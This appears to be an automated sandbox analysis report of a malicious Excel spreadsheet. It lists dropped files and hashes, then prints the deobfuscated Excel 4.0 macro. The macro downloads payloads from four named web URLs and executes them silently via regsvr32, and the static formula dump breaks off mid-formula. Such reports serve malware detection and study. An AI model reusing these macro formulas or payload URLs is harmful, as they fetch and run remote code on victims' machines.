C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\zz64mUdXWhBECsusJb[1].dll
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.16575605643124 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DTOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+WssGHtUxQ8ORqlGPkEUa |
MD5: | 4C2C2216C9762002AAE6B71FE28D4BF1 |
SHA1: | 55A7BDC775F59FF4F2E77FB25F1112F958C53B4C |
SHA-256: | 0154046F0902F06FB815DD5935031F340D0900AD9E6EE95F58C6DF29B02978D2 |
SHA-512: | 2419B784093D0028DCB754D48C45AEA0F529124D625E21AD3DB936FC4EF136F47434EA9F496D7F4A57BCA9CBD5E4B71F776500678A92C45C625193829AC0F611 |
Malicious: | true |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1796 |
Entropy (8bit): | 4.551936382026819 |
Encrypted: | false |
SSDEEP: | 24:I663BAbP9b7CX33AMSD6bzlAbRNIvoMgPw8RTt/WZwZ3k0w8bsSRjwZ3T:I663BAxarSWbmb7zl1t/VZ5ASR8ZD |
MD5: | 9484690A29B55E8201E505F0876C3F19 |
SHA1: | 28DBF7688C3DC47E19B08751C65DFA879FA66966 |
SHA-256: | 089A7ADD2DFE158E123AA6B407A8ACE2945FD7962BAD53C8F18129572D47268B |
SHA-512: | 0EE1B812C2FA6FCBEE3E452D51CAE5771D579465601319E32BECA17E842F1349AA6C5F9BDDA25E107514CAA0BE45FE47F74875938A37756CE87C9B73FE1A8F47 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 61712 |
Entropy (8bit): | 7.995044632446497 |
Encrypted: | true |
SSDEEP: | 1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx |
MD5: | 589C442FC7A0C70DCA927115A700D41E |
SHA1: | 66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31 |
SHA-256: | 2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A |
SHA-512: | 1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 2022 |
Entropy (8bit): | 4.515694748603974 |
Encrypted: | false |
SSDEEP: | 48:6R0QD3C+EpWbNGK/WIEz5G7XtKCkKZk4kPETcCV3Ubjy:6R0QDy+X42KCkK2DeUq |
MD5: | 510FF11AFA561695E167E5D48FCF8F63 |
SHA1: | 83E6ABB8EB19C957A7710764CC2A0683E45DC77C |
SHA-256: | 9CB33798B49CD9B57BEEA12CE58586918E2B0912A60415B25B4E284C07A228ED |
SHA-512: | 0F008A201B3AAFBB4CCB527A6CF77F0C28A0F0DDBA5864D437C9DAA4D112A4320969533E2F01FC3E80CB8F236AF79B91CF146138D703DC108AB05A16C5C8271A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 36 |
Entropy (8bit): | 4.030493056757482 |
Encrypted: | false |
SSDEEP: | 3:XT5LzdUA2AGN8y:XtLxUANGN8y |
MD5: | C58986635C266E6C06609B908580BEDE |
SHA1: | 4672DCE03D3DD9560CF74035AFF3D9AEBB7201E4 |
SHA-256: | A2F1BB2817F976E129974B003E3EC12FB8A644C1952BB667116317FD26416042 |
SHA-512: | 36241E4BDA8AD7E4137624BBFBB999C643D34A2095BA078F9886D92F4726913BDB9DC1E1F44141A6738C1E4D9042B802E49F774C0F1C6901735F4B069834449F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1796 |
Entropy (8bit): | 4.551936382026819 |
Encrypted: | false |
SSDEEP: | 24:I663BAbP9b7CX33AMSD6bzlAbRNIvoMgPw8RTt/WZwZ3k0w8bsSRjwZ3T:I663BAxarSWbmb7zl1t/VZ5ASR8ZD |
MD5: | 9484690A29B55E8201E505F0876C3F19 |
SHA1: | 28DBF7688C3DC47E19B08751C65DFA879FA66966 |
SHA-256: | 089A7ADD2DFE158E123AA6B407A8ACE2945FD7962BAD53C8F18129572D47268B |
SHA-512: | 0EE1B812C2FA6FCBEE3E452D51CAE5771D579465601319E32BECA17E842F1349AA6C5F9BDDA25E107514CAA0BE45FE47F74875938A37756CE87C9B73FE1A8F47 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 36 |
Entropy (8bit): | 4.030493056757482 |
Encrypted: | false |
SSDEEP: | 3:XT5LzdUA2AGN8y:XtLxUANGN8y |
MD5: | C58986635C266E6C06609B908580BEDE |
SHA1: | 4672DCE03D3DD9560CF74035AFF3D9AEBB7201E4 |
SHA-256: | A2F1BB2817F976E129974B003E3EC12FB8A644C1952BB667116317FD26416042 |
SHA-512: | 36241E4BDA8AD7E4137624BBFBB999C643D34A2095BA078F9886D92F4726913BDB9DC1E1F44141A6738C1E4D9042B802E49F774C0F1C6901735F4B069834449F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 2022 |
Entropy (8bit): | 4.514687751500104 |
Encrypted: | false |
SSDEEP: | 48:6R0QD3C+EpWbNGK/WIEz5G7XtKCkKZk9mLOpETcCV3Ubjy:6R0QDy+X42KCkK22seUq |
MD5: | 2D00D4B766AE9B18D798416BCE2486F5 |
SHA1: | 3DE81F0BAB95AD7ECB062B224DDACA6907D154E7 |
SHA-256: | B6EE27F48A50CE57DEBAE667F991955F68C9D8E9B555DE1905F5D27266EB9EBB |
SHA-512: | 8770044FFC3EA923374B3507539F20BA1DE50DC5FDB0B3CFBB1B497751208071D248CD38E4FE8EE478DAD89F9A20FD11472858B1C88E138ABEE49EC2AC48D16E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 162298 |
Entropy (8bit): | 6.30209028339373 |
Encrypted: | false |
SSDEEP: | 1536:1ra6crtilgCyNY2IpFQNujcz5YJkKCC/rH8Zz04D8rlCMiB3XlMc6h:1x0imCy6QNujcmJkr97MiVGzh |
MD5: | 7EE994C83F2744D702CBA18693ED1758 |
SHA1: | 17EAA8A28E7ABF096E97537EFE25A34CD7C1FD80 |
SHA-256: | 5DB917AB6DC8A42A43617850DFBE2C7F26A7F810B229B349E9DD2A2D615671D2 |
SHA-512: | D5ED3AD13D58B6D41347D4521F71F9C5DCC3CA706AD1E3A96A9837C8E9087EB511896CA5B49904FC13E6FA176960F4B538379638FCF1D5E8DF6B30072F216BDA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 28672 |
Entropy (8bit): | 3.2190648480502198 |
Encrypted: | false |
SSDEEP: | 768:ckP4Kpb8rGYrMPe3q7Q0XV5xtezEs/68/dgA2HN:cFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dK |
MD5: | FA50E97F868C3655B7D567C425858FAD |
SHA1: | E06DFA1C6EAC1293AA01EE60F9D43F33ED841125 |
SHA-256: | D1743E74E01ACB3EB8FD4616D110577638B04A8023E7E07AAD8B32D955B9252B |
SHA-512: | 4E018669C82705DD69250EE5ED483496CE74AC95956BD04AB8111727076FB89EB64EC0261DE4D4FF5CC41F710527015109B4009C0D5D990B095CEBBA96C3374A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 28672 |
Entropy (8bit): | 3.2190648480502198 |
Encrypted: | false |
SSDEEP: | 768:ckP4Kpb8rGYrMPe3q7Q0XV5xtezEs/68/dgA2HN:cFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dK |
MD5: | FA50E97F868C3655B7D567C425858FAD |
SHA1: | E06DFA1C6EAC1293AA01EE60F9D43F33ED841125 |
SHA-256: | D1743E74E01ACB3EB8FD4616D110577638B04A8023E7E07AAD8B32D955B9252B |
SHA-512: | 4E018669C82705DD69250EE5ED483496CE74AC95956BD04AB8111727076FB89EB64EC0261DE4D4FF5CC41F710527015109B4009C0D5D990B095CEBBA96C3374A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96768 |
Entropy (8bit): | 4.883436134101901 |
Encrypted: | false |
SSDEEP: | 1536:wFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgzHuS4hcTO97v7UYdEJmfcM:2Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dga |
MD5: | 3349D3B955C0B64909114E14BF8F5BAE |
SHA1: | D2965559D5CA48FECCCD6B9D7CB72852305317CA |
SHA-256: | C6A8F600C987D31FB7EA868A4984AB0B6862DBB1ACF71C30BE79DC6B35DAB33D |
SHA-512: | 98FB3D1A9996F96CA375ED4895A5347E95BB70031B42A4353226B2145330F4CA1BC12710C287C0057FA95105E09B0C8A9A7FFC38D02111FB4598E78FB28C3354 |
Malicious: | false |
Yara Hits: |
|
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96768 |
Entropy (8bit): | 4.88343059823806 |
Encrypted: | false |
SSDEEP: | 1536:wFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgzHuS4hcTO97v7UYdEJmfc8:2Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgS |
MD5: | 681CF81591E835B003AF6F235763840A |
SHA1: | 9526AB68149D6CB679BD80A217CAE2D4CC5B5FD8 |
SHA-256: | CCBEB0D5FF6DF2716DB0BCF8680F10DDB838B333DD93D9FD2B0BDD3982D95A59 |
SHA-512: | 5788862B11024C09FFF80E1439F18C03918AD7F67F39A494A7605B9A3CC69EF90C474C3A8A5CA40D6571E1AB08FD7337D91FABC0F2395A0D9BFF0E00CF961EE0 |
Malicious: | true |
Yara Hits: |
|
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.16575605643124 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DTOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+WssGHtUxQ8ORqlGPkEUa |
MD5: | 4C2C2216C9762002AAE6B71FE28D4BF1 |
SHA1: | 55A7BDC775F59FF4F2E77FB25F1112F958C53B4C |
SHA-256: | 0154046F0902F06FB815DD5935031F340D0900AD9E6EE95F58C6DF29B02978D2 |
SHA-512: | 2419B784093D0028DCB754D48C45AEA0F529124D625E21AD3DB936FC4EF136F47434EA9F496D7F4A57BCA9CBD5E4B71F776500678A92C45C625193829AC0F611 |
Malicious: | true |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.16575875022004 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DrOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq++ssGHtUxQ8ORqlGPkEUa |
MD5: | 5036455CEB237611F6F132F0B53D7A36 |
SHA1: | 1E9070ABE52AE5BB9673C8DE31D1171EA39A69CF |
SHA-256: | 98D16D9F6DBEAAE1C48552D781B477923A5269061926528A28AF8205EE61B056 |
SHA-512: | 2D3DA0F65C82AEF0076F898C0CCE2FEB67FF348473A8FD8BDDC4F5D2021A359B9917084AFC7DD712A788256CB1B6FB78F98EA66149408C7DFB2EC36FA12AEAAC |
Malicious: | true |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.1657581863798265 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DcOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+ZssGHtUxQ8ORqlGPkEUa |
MD5: | A86AC8A994FD225710B373EDB7B5A575 |
SHA1: | DF8754FECA62D5832D21B2B2F3EAE587224DF47C |
SHA-256: | 0DFDD744F867D1C76767FB892005BFAEF321EEAAED3AB6A875362899AA7D0562 |
SHA-512: | 28D14E48653BCB7FE06428EA8974F8518E835504E93F3A3C3E77B3646867FF93230CEC3683BFB8B923BD92918A187BBED87B8418776B2BBCF40C2750A54A5311 |
Malicious: | true |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.165762249523314 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DfOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+assGHtUxQ8ORqlGPkEUa |
MD5: | 01D64AC21455EF67D9D04DAC9A4276D7 |
SHA1: | 15FDB2B45F2554D76577E93B5799DF38CAC823C1 |
SHA-256: | EA4EA1CDF2694173E9991A63A5B4AE581102AAD6A903713CC4266EF30358DF90 |
SHA-512: | A39CB71D576430B6F38E08819F4FC6C096F10046400DAE7D687F3503D7D22AB2144D991C2D90F46461AF712B8FA6AE2F204750C4F00C33D810F1D9879D19DC44 |
Malicious: | true |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.16575605643124 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DTOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+WssGHtUxQ8ORqlGPkEUa |
MD5: | 4C2C2216C9762002AAE6B71FE28D4BF1 |
SHA1: | 55A7BDC775F59FF4F2E77FB25F1112F958C53B4C |
SHA-256: | 0154046F0902F06FB815DD5935031F340D0900AD9E6EE95F58C6DF29B02978D2 |
SHA-512: | 2419B784093D0028DCB754D48C45AEA0F529124D625E21AD3DB936FC4EF136F47434EA9F496D7F4A57BCA9CBD5E4B71F776500678A92C45C625193829AC0F611 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.16575875022004 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DrOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq++ssGHtUxQ8ORqlGPkEUa |
MD5: | 5036455CEB237611F6F132F0B53D7A36 |
SHA1: | 1E9070ABE52AE5BB9673C8DE31D1171EA39A69CF |
SHA-256: | 98D16D9F6DBEAAE1C48552D781B477923A5269061926528A28AF8205EE61B056 |
SHA-512: | 2D3DA0F65C82AEF0076F898C0CCE2FEB67FF348473A8FD8BDDC4F5D2021A359B9917084AFC7DD712A788256CB1B6FB78F98EA66149408C7DFB2EC36FA12AEAAC |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.165762249523314 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DfOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+assGHtUxQ8ORqlGPkEUa |
MD5: | 01D64AC21455EF67D9D04DAC9A4276D7 |
SHA1: | 15FDB2B45F2554D76577E93B5799DF38CAC823C1 |
SHA-256: | EA4EA1CDF2694173E9991A63A5B4AE581102AAD6A903713CC4266EF30358DF90 |
SHA-512: | A39CB71D576430B6F38E08819F4FC6C096F10046400DAE7D687F3503D7D22AB2144D991C2D90F46461AF712B8FA6AE2F204750C4F00C33D810F1D9879D19DC44 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.1657581863798265 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DcOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+ZssGHtUxQ8ORqlGPkEUa |
MD5: | A86AC8A994FD225710B373EDB7B5A575 |
SHA1: | DF8754FECA62D5832D21B2B2F3EAE587224DF47C |
SHA-256: | 0DFDD744F867D1C76767FB892005BFAEF321EEAAED3AB6A875362899AA7D0562 |
SHA-512: | 28D14E48653BCB7FE06428EA8974F8518E835504E93F3A3C3E77B3646867FF93230CEC3683BFB8B923BD92918A187BBED87B8418776B2BBCF40C2750A54A5311 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.882797916119669 |
TrID: |
|
File name: | informe_30062022.xls |
File size: | 96768 |
MD5: | 94db48e7998540a932a0698c1f9d8325 |
SHA1: | e7fd09159aaf8ea2357de4daca3ce482ca9b2adc |
SHA256: | 9bc74075f7f482e4166f2cde5213948915b9d9f7885e49ab434c9c036486ba56 |
SHA512: | c0e83653b549610709b9683f35874331294ad11205069b639697731d3c1b30bb5c20a99c37f7435e3171bb19b788eefc29a44ec05e2ebeeb9512d721fc73bb3a |
SSDEEP: | 1536:NFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgzHuS4hcTO97v7UYdEJmfcU:3Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgy |
TLSH: | B6936B45B699DA5EF625833108E787A67333FC304F6B47472264B3267FB99A04B0721B |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
Icon Hash: | e4eea286a4b4bcb4 |
Document Type: | OLE |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05 18:19:34 |
Last Saved Time: | 2022-06-30 08:06:00 |
Creating Application: | |
Security: | 0 |
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 1048576 |
General | |
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.3944713856337448 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . . . . S h e e |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 20 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e0 00 00 00 |
General | |
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.27589690377667914 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D r e a m . . . . . . . . . . . R G S G K . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . . $ . < X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00 |
General | |
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 86381 |
Entropy: | 5.249089526159097 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . R G S G K B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V e 1 8 . . . . . . . X . @ . . . |
Data Raw: | 09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 52 47 53 47 4b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Name: | Sheet7 |
Extraction: | dynamic |
Type: | 4 |
Final: | False |
Visible: | True |
Protected: | False |
13,5,=ACOS(5365675754)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aysbody.com/catalog/FlJ6iKCntAwfO85/","..\sctm1.ocx",0,0)",F24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm1.ocx")",F26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hepsisifa.com/wp-content/T0kkNeOlvF/","..\sctm2.ocx",0,0)",F28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm2.ocx")",F30)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.hayalkatibi.com/catalog/pJix6SFfnbNWFMuu8m/","..\sctm3.ocx",0,0)",F32)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm3.ocx")",F34)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://fikti.bem.gunadarma.ac.id/SDM/wC256Xn/","..\sctm4.ocx",0,0)",F36)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm4.ocx")",F38)=FORMULA("=RETURN()",F40) |
Name: | Sheet7 |
Extraction: | dynamic |
Type: | 4 |
Final: | False |
Visible: | True |
Protected: | False |
13,5,=ACOS(5365675754)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aysbody.com/catalog/FlJ6iKCntAwfO85/","..\sctm1.ocx",0,0)",F24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm1.ocx")",F26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hepsisifa.com/wp-content/T0kkNeOlvF/","..\sctm2.ocx",0,0)",F28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm2.ocx")",F30)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.hayalkatibi.com/catalog/pJix6SFfnbNWFMuu8m/","..\sctm3.ocx",0,0)",F32)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm3.ocx")",F34)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://fikti.bem.gunadarma.ac.id/SDM/wC256Xn/","..\sctm4.ocx",0,0)",F36)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm4.ocx")",F38)=FORMULA("=RETURN()",F40) 23,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aysbody.com/catalog/FlJ6iKCntAwfO85/","..\sctm1.ocx",0,0) 25,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm1.ocx") 27,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hepsisifa.com/wp-content/T0kkNeOlvF/","..\sctm2.ocx",0,0) 29,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm2.ocx") 31,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.hayalkatibi.com/catalog/pJix6SFfnbNWFMuu8m/","..\sctm3.ocx",0,0) 33,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm3.ocx") 35,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://fikti.bem.gunadarma.ac.id/SDM/wC256Xn/","..\sctm4.ocx",0,0) 37,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\sctm4.ocx") 39,5,=RETURN() |
Name: | Sheet7, Macrosheet |
Extraction: | static |
Type: | unknown |
Final: | unknown |
Visible: | True |
Protected: | unknown |
SHEET: Sheet7, Macrosheet CELL:F14, =((((((((ACOS(5365675754.0)=FORMULA((((((((((((('Sheet2'!L24&'Sheet2'!L26)&'Sheet2'!L27)&'Sheet2'!L28)&'Sheet2'!L28)&'Sheet3'!C8)&'Sheet3'!H15)&'Sheet2'!F10)&'Sheet3'!R4)&'Sheet6'!S18)&'Sheet3'!F20)&'Sheet4'!S10)&'Sheet6'!D8)&'Sheet4'!S17,F24))=FORMULA((((((((((((((((((('Sheet2'!L24&'Sheet2'!G8)&'Sheet2'!F4)&'Sheet2'!G8)&'Sheet2'!O3)&'Sheet2'!L30)&'Sheet2'!F24)&'Sheet2'!L26)&'Sheet4'!L13)&'Sheet4'!F7)&'Sheet2'!A4)&'Sheet4'!C15)&'Sheet2'!A4)&'Sheet4'!O33)&'Sheet2'!F10)&'Sheet4'!L23)&'Sheet4'!F20)&'Sheet6'!D8)&'Sheet2'!F24)&'Sheet2'!L31,F26))=FORMULA((((((((((((('Sheet2'!L24&'Sheet2'!L26)&'Sheet2'!L27)&'Sheet2'!L28)&'Sheet2'!L28)&'Sheet3'!C8)&'Sheet3'!H15)&'Sheet2'!F10)&'Sheet3'!R4)&'Sheet6'!S18)&'Sheet3'!G22)&'Sheet4'!S10)&'Sheet6'!F18)&'Sheet4'!S17,F28))=FORMULA((((((((((((((((((('Sheet2'!L24&'Sheet2'!G8)&'Sheet2'!F4)&'Sheet2'!G8)&'Sheet2'!O3)&'Sheet2'!L30)&'Sheet2'!F24)&'Sheet2'!L26)&'Sheet4'!L13)&'Sheet4'!F7)&'Sheet2'!A4)&'Sheet4'!C15)&'Sheet2'!A4)&'Sheet4'!O33)&'Sheet2'!F10)&'Sheet4'!L23)&'Sheet4'!F20)&'Sheet6'!F18)&'Sheet2'!F24)&'Sheet2'!L31,F30))=FORMULA((((((((((((('Sheet2'!L24&'Sheet2'!L26)&'Sheet2'!L27)&'Sheet2'!L28)&'Sheet2'!L28)&'Sheet3'!C8)&'Sheet3'!H15)&'Sheet2'!F10)&'Sheet3'!R4)&'Sheet6'!S18)&'Sheet3'!H20)&'Sheet4'!S10)&'Sheet6'!K3)&'Sheet4'!S17,F32))=FORMULA((((((((((((((((((('Sheet2'!L24&'Sheet2'!G8)&'Sheet2'!F4)&'Sheet2'!G8)&'Sheet2'!O3)&'Sheet2'!L30)&'Sheet2'!F24)&'Sheet2'!L26)&'Sheet4'!L13)&'Sheet4'!F7)&'Sheet2'!A4)&'Sheet4'!C15)&'Sheet2'!A4)&'Sheet4'!O33)&'Sheet2'!F10)&'Sheet4'!L23)&'Sheet4'!F20)&'Sheet6'!K3)&'Sheet2'!F24)&'Sheet2'!L31,F34))=FORMULA((((((((((((('Sheet2'!L24&'Sheet2'!L26)&'Sheet2'!L27)&'Sheet2'!L28)&'Sheet2'!L28)&'Sheet3'!C8)&'Sheet3'!H15)&'Sheet2'!F10)&'Sheet3'!R4)&'Sheet6'!S18)&'Sheet3'!I22)&'Sheet4'!S10)&'Sheet6'!Q12)&'Sheet4'!S17,F36))=FORMULA((((((((((((((((((('Sheet2'!L24&'Sheet2'!G8)&'Sheet2'!F4)&'Sheet2'!G8)&'Sheet2'!O3)&'Sheet2'!L30)&'Sheet2'!F24)&'Sheet2'!L26)&'Sheet4'!L13)&'Sheet4'!F7)&'Sheet2'!A4)&'Sheet4'!C15)&'Sheet2'!